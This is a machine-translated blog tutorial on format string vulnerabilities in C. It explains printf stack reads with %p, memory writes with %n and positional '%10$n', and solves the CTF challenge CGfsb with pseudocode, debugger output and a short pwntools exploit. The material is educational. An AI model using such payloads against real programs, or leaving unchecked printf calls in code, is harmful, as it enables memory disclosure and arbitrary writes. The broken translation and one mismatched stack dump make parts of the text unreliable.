<> Detailed explanation of format string vulnerability

​ Recently, I read a lot of articles about formatting string vulnerability exploitation , I found that the writing was not so meaningful , So I decided to write one myself , Combined with examples , Take a good look at this knowledge point .

<>1, The principle of vulnerability generation

​ For general functions , It should be done according to cdecl (C Declaration)
Function calls require that the parameters of a function be stacked from right to left ,** however printf It's not a general function , It is C Library functions with variable parameters are rare in languages , therefore , Before being called , The callee cannot know how many parameters are pushed onto the stack before the function is called . therefore printf Function requires an format Parameter to specify the number and type of parameters , then printf The function will follow strictly format The format specified by the parameters is taken out from the stack one by one and the parameters are output .** that , What are the output formats to choose from ?

*
%d Output in decimal integer format

*
%s Output in string format

*
%x Output in hexadecimal format

*
%c Output in character format

*
%p Output in pointer format

*
%n The number of characters output so far ( Take one int Write the value to the specified address )

Let's take a look at the sample code :
#include <stdio.h> int main() { printf("%s %d %d %d %d","num",1,2,3,4); return
0; }
If the above program runs normally , The body of the assembly code is like this :
0x000011ad <+20>: add eax,0x2e53 0x000011b2 <+25>: sub esp,0x8 0x000011b5
<+28>: push 0x4 0x000011b7 <+30>: push 0x3 0x000011b9 <+32>: push 0x2
0x000011bb <+34>: push 0x1 0x000011bd <+36>: lea edx,[eax-0x1ff8] 0x000011c3
<+42>: push edx 0x000011c4 <+43>: lea edx,[eax-0x1ff4] 0x000011ca <+49>: push
edx 0x000011cb <+50>: mov ebx,eax 0x000011cd <+52>: call 0x1030 <printf@plt>
At this point, the contents of the stack
00:0000│ esp 0xffffd190 —▸ 0x5655700c ◂— '%d %d %d %d %s %x %x' 01:0004│
0xffffd194 —▸ 0x56557008 ◂— 0x6d756e /* 'num' */ 02:0008│ 0xffffd198 ◂— 0x1
03:000c│ 0xffffd19c ◂— 0x2 04:0010│ 0xffffd1a0 ◂— 0x3 05:0014│ 0xffffd1a4 ◂—
0x4 06:0018│ 0xffffd1a8 —▸ 0xffffd27c —▸ 0xffffd452 ◂— 'SHELL=/bin/bash'
07:001c│ 0xffffd1ac —▸ 0x565561ad (main+20) ◂— add eax, 0x2e53
here , A bold idea came to mind : If I give you format What happens when the number of parameters is greater than the number of parameters to be output ?

Sample code :
#include <stdio.h> int main() { printf("%s %d %d %d %d %x %x","num",1,2,3,4);
return 0; }
Assembly code body :
0x000011ad <+20>: add eax,0x2e53 0x000011b2 <+25>: sub esp,0x8 0x000011b5
<+28>: push 0x4 0x000011b7 <+30>: push 0x3 0x000011b9 <+32>: push 0x2
0x000011bb <+34>: push 0x1 0x000011bd <+36>: lea edx,[eax-0x1ff8] 0x000011c3
<+42>: push edx 0x000011c4 <+43>: lea edx,[eax-0x1ff4] 0x000011ca <+49>: push
edx 0x000011cb <+50>: mov ebx,eax 0x000011cd <+52>: call 0x1030 <printf@plt>
Stack :
00:0000│ esp 0xffffd190 —▸ 0x5655700c ◂— '%d %d %d %d %s %x %x' 01:0004│
0xffffd194 —▸ 0x56557008 ◂— 0x6d756e /* 'num' */ 02:0008│ 0xffffd198 ◂— 0x1
03:000c│ 0xffffd19c ◂— 0x2 04:0010│ 0xffffd1a0 ◂— 0x3 05:0014│ 0xffffd1a4 ◂—
0x4 06:0018│ 0xffffd1a8 —▸ 0xffffd27c —▸ 0xffffd44e ◂— 'SHELL=/bin/bash'
07:001c│ 0xffffd1ac —▸ 0x565561ad (main+20) ◂— add eax, 0x2e53
Running results :
1 2 3 33 test 1a1390 4013e8 -------------------------------- Process exited
after 0.01398 seconds with return value 0
Although we have given 7 A parameter that formats the output , But the only parameters that are actually pushed into the stack are 5 individual , therefore ,printf It will output two address contents that should not be output , Take advantage of this loophole , We just let out the data in the stack .

<>2, Vulnerability exploitation

<>1). Disclosure of any address content

Let's solve a problem with the help of attack and defense (CGfsb) To understand this knowledge point

Here's how to use IDA Get the pseudo code body
01| puts("please tell me your name:"); 02| read(0, &v5, 0xAu); 03| puts("leave
your message please:"); 04| fgets((char *)&v8, 100, stdin); 05| printf("hello
%s", &v5); 06| puts("your message is:"); 07| printf((const char *)&v8); 08| if (
pwnme== 8 ) 09| { 10| puts("you pwned me, here is your flag:\n"); 11| system(
"cat flag"); 12| } 13| else 14| { 15| puts("Thank you!"); 16| }
See the second 7 that 's ok ,printf Output of the previous input v8 variable , But no formatting parameters are given , So we can construct v8 Let's use the value of printf Mistakenly thought that the program has given the format parameter
, So as to obediently output the value we need according to our meaning .

Operation effect :
Starting program: /root/pwn resources/gongfang/CGfsb_print_f please tell me
your name: aaaa leave your message please: AAAA %p %p %p %p %p %p %p %p %p %p
%p %p %p %p %p %p %p %p %p hello aaaa your message is: AAAA0xffffd13e
0xf7fae580 0xffffd19c 0xf7ffdae0 0x1 0xf7fcb410 0x61610001 0xa6161 (nil)
0x41414141 0x25207025 0x70252070 0x20702520 0x20207025 0x20207025 0x20207025
0x20207025 0x20207025 0x20207025 Thank you! [Inferior 1 (process 622877) exited
normally]
obviously , The program leaked what we wanted to know printf Function stack frame output string 19 The value of a memory unit , In theory , We can use this vulnerability to read arbitrary values in the stack
( Yes, it's the pleasure of doing whatever you want )

<>2). Modify any address value

Some people may be puzzled by the title , Why? printf Write operations can also be performed ?

Any address to write will use the above said %n It's over , Examples are as follows :
int main(void) { int c = 0; printf("the usage of %n", &c); printf("c = %d\n", c
); return 0; }
The output of this program will be "c = 13"

That is to say **%n The parameter assigns the number of characters it outputs to the variable c**

that , We just need to change c Can't the address in the corresponding stack assign the value we want to the corresponding address ?

Maybe you don't understand at this point , No problem , Let's look at the structure of the stack

printf Top of function stack
Format output parameters (%d %x %s %n)
Parameters to be output 1(%d format )
Parameters to be output 2(%x format )
Parameters to be output 3(%s format )
Parameters to be assigned 4( address )
printf Bottom of function stack
Top of function stack previously called **



That is to say , We assign the total length of the previous output characters to the parameter 4 Corresponding address , in other words , As long as we control the length of the previous output, we can control the value of the address corresponding to the parameter .

however , Here comes the problem again , How do we control the parameters 4 What's the value ?

That's what we need printf Another feature of :$ Operator . This operator can output a parameter at a specified position .

That is to say ,
If the formatted output parameter is “%6$n” In my words , The length of the previous output is assigned to the printf The second order of function 6 Parameters , however printf Function doesn't know how big its stack is , So we just need to locate the offset value to the memory space that we can modify , For example, in the title v8 The address of the variable is OK
~

What is the offset in the title ?

Let's take a look at the input running result of peeking at the memory space of any location constructed earlier :
AAAA 0xffffd13e 0xf7fae580 0xffffd19c 0xf7ffdae0 0x1 0xf7fcb410 0x61610001
0xa6161 (nil) 0x41414141 0x25207025 0x70252070 0x20702520 0x20207025 0x20207025
0x20207025 0x20207025 0x20207025 0x20207025

notice ‘0x41414141‘, That's what we input AAAA, in other words , We can control the relative location of the memory space printf The second order of function 10 Two parameter locations ( actually printf Function doesn't have so many arguments at all , But he didn't know )(10 How did you get here ? from AAAA reach 0x41414141 There are nine more outputs , therefore v8 In the position relative to the tenth parameter )

So we can construct our exp It's over !!!
from pwn import * r = process("./CGfsb") pwnme_addr = 0x0804A068
#pwnme Double click the address in the pseudo code to view it payload = p32(pwnme_addr) + 'aaaa' + '%10$n'
#pwnme Your address needs to go through 32 Bit code conversion , It's four , and pwnme Need to be equal to 8, therefore ‘aaaa’ It plays the role of rounding up the number of words , bring r.recvuntil("please
tell me your name:\n") r.sendline('aaaa') r.recvuntil("leave your message
please:\n") r.sendline(payload) r.interactive()

It took two days for this article to look up information and code , During the period, I asked quite a lot of big men , But I didn't get the answer I wanted , In the end, this article is based on my understanding of assembly and the characteristic code of function . Sure enough , Once in pwn The door is as deep as the sea , From then on, hair is a passer-by . If it is helpful to you after reading the article , Might as well order a wave of praise to support me with cool scalp
【 Manual funny 】

Technology
©2019-2020 Toolsou All rights reserved,
Huawei 2021 session Hardware Engineer Logical post (FPGA) Super detailed surface !!!Vue-element-admin upgrade ui edition virtual machine VMware Download and install the most detailed tutorial !C++ Move constructor and copy constructor sound of dripping water java Backstage interview pygame Realize full screen mode and adjustable window size mysql Database setting character set configuration modification my.ini file (windows)30 What's the experience of being a junior programmer at the age of 20 C++ Multithreading programming ( Summary of common functions and parameters )python_ cherry tree